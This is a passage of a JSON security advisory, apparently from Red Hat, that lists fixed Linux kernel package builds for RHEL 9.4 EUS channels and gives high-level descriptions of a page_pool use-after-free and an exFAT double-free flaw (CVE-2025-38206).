"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: Linux kernel: Use-after-free vulnerability in page_pool_recycle_in_ring can lead to arbitrary code execution"
},
{
"cve": "CVE-2025-38206",
"cwe": {
"id": "CWE-763",
"name": "Release of Invalid Pointer or Reference"
},
"discovery_date": "2025-07-04T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2376377"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Linux kernel\u0027s exFAT filesystem driver. A local attacker with low privileges could exploit a double free vulnerability within the `delayed_free` function. This memory corruption flaw can lead to a denial of service (DoS), potentially causing system instability or crashes. It may also result in information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: Kernel: Double free vulnerability in exFAT filesystem can lead to denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Moderate impact double free vulnerability in the Linux kernel\u0027s exFAT filesystem driver affects Red Hat Enterprise Linux 9 and 10. A local attacker with a special group privileges could exploit this flaw, leading to a denial of service, system instability, or crashes.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
